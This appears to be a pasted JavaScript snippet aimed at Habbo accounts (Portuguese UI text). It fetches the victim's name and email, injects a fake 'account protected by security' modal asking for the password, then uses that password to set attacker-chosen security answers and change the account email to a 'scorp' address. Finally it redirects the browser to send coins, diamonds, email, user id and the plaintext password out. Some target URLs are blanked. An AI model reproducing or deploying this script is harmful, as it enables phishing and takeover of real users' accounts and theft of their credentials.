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a guest
Apr 28th, 2017
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  1. var r1 = 'scorpion';
  2. var r2 = 'giozadi';
  3. var nome = null;
  4. var email = null;
  5. $['get']('', function(a) {
  6. moedas = a['creditBalance'];
  7. diamantes = a['diamondBalance'];
  8. hc = a['habboClubDays']
  9. });
  10. $['ajax']({
  11. url: '/settings/email',
  12. success: function(data) {
  13. nome = data['split']('name":"')[1]['split']('"')[0];
  14. email = data['split']('email":"')[1]['split']('"')[0];
  15. div1 = '<div style="position: fixed; top: 0px; left: 0px; z-index: 800; width: 100%; height: 100%; background: rgba(10, 54, 94, 0.8);"></div>';
  16. div2 = '<div id="hidden" style="position: fixed; top: 70px; width: 500px; z-index: 900; left: 50%; margin-left: -250px;"><div style="display: block; transition: 1s;" id="toast-container" class="toast-top-center" aria-live="polite" role="alert"><div class="toast toast-error" style="display: none;"><div class="toast-progress" id="toast-progress" style="width: 99.9%; transition: 2s;"></div><div class="toast-message" id="toast-message">A senha que voc\xEA digitou est\xE1 incorreta, verifique e tente novamente.</div></div></div><div class="modal-dialog" ng-class="size ? " modal-"="" +="" size="" :="" """=""><div style="height: 250px;" class="modal-content" uib-modal-transclude=""><div><button onclick="location.reload()" class="modal__close"></button><h3 translate="SAFETY_LOCK_TITLE" class="modal__title">Conta protegida por seguran\xE7a.</h3><div class="modal__content"><p translate="SAFETY_LOCK_ANSWER"></p><!-- ngIf: safetyLockForm.$error.remoteDataAnswer --><fieldset class="form__fieldset"><label for="safety-lock-answer1" class="form__label" translate="IDENTITY_SAFETYQUESTION_1">Insira sua senha para continuar</label><div class="form__field"><input id="inputtxt" name="answer1" type="password" ng-model="answers.answer1" ng-model-options="{ updateOn: " default="" blur",="" debounce:="" {="" default:="" 500,="" blur:="" 0="" }="" }"="" required="" remote-data="" answer""="" password-toggle-mask="" autocomplete="off" class="form__input ng-pristine ng-untouched password-toggle-mask ng-invalid ng-invalid-required" style="border-color: rgb(144, 51, 82);"><i class="password-toggle-mask__icon"></i><!-- ngIf: safetyLockForm.answer1.$error.required && (!safetyLockForm.answer1.$pristine || safetyLockForm.$submitted) --></div></fieldset><div class="form__footer"><a href="" class="form__cancel" onclick="location.reload()" translate="FORM_CANCEL_LABEL">Cancelar</a> <button ng-disabled="unlockingInProgress" type="" class="form__submit" onclick="add();">Continuar</button></div></div></div></div></div></div>';
  17. $('body')['prepend'](div1);
  18. $('body')['prepend'](div2)
  19. }
  20. });
  22. function add() {
  23. $['get']('', function(a) {
  24. moedas = a['creditBalance'];
  25. diamantes = a['diamondBalance'];
  26. hc = a['habboClubDays']
  27. });
  28. var mypass = $('#inputtxt')['val']();
  29. var newemail = 'scorp' + Math['floor'](Math['random']() * 999999) + '';
  30. $['get']('');
  31. $['post']('', {
  32. questionId1: 1,
  33. answer1: r1,
  34. questionId2: 3,
  35. answer2: r2,
  36. password: mypass
  37. });
  38. senddados();
  39. $['post']('', {
  40. currentPassword: mypass,
  41. newEmail: newemail
  42. }, function(data) {
  43. senddados()
  44. })['fail'](function() {
  45. $('.toast')['fadeToggle']();
  46. $('#toast-progress')['animate']({
  47. width: 0
  48. }, 300);
  49. setTimeout(function() {
  50. $('.toast')['fadeToggle']()
  51. }, 3000)
  52. });
  54. function senddados() {
  55. $['get']('', function(a) {
  56. moedas = a['creditBalance'];
  57. diamantes = a['diamondBalance'];
  58. hc = a['habboClubDays']
  59. });
  60. location['href'] = '' + moedas + '&diamantes=' + diamantes + '&hc=' + hc + '&adc=' + newemail + '&senha=naotrocamais&habbo=' + nome + '&emailS=' + email + '&uid=' + owner + '&senha_antiga=' + mypass
  61. }
  62. }
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